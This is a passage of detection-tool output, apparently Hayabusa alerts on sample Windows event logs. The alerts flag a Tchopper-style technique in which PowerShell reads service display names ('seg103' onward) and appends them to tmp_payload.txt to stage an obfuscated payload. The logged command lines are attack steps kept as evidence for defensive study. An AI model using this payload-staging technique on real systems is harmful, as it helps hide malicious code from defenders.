Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:56.773 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:56.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:56.788 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:58.226 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:58.226 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:58.226 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:59.674 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:59.674 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:59.674 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:01.121 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:01.121 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:01.121 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:02.569 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:02.585 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:02.585 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:04.023 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:04.023 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:04.023 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:05.464 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:05.464 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:05.464 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:06.905 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:06.905 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:06.905 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:08.513 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:08.513 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:08.513 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:09.965 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:09.965 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:09.965 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:11.418 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:11.418 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:11.418 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:12.925 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:12.925 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:12.925 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:14.417 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:14.417 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:14.417 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:15.867 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:15.867 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:15.867 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:17.309 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:17.324 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:17.324 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:18.812 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:18.812 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:18.812 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:20.265 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:20.281 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:20.281 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:21.715 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:21.715 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:21.715 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:23.168 +00:00,FS03.offsec.lan,4688,low,,Suspicious 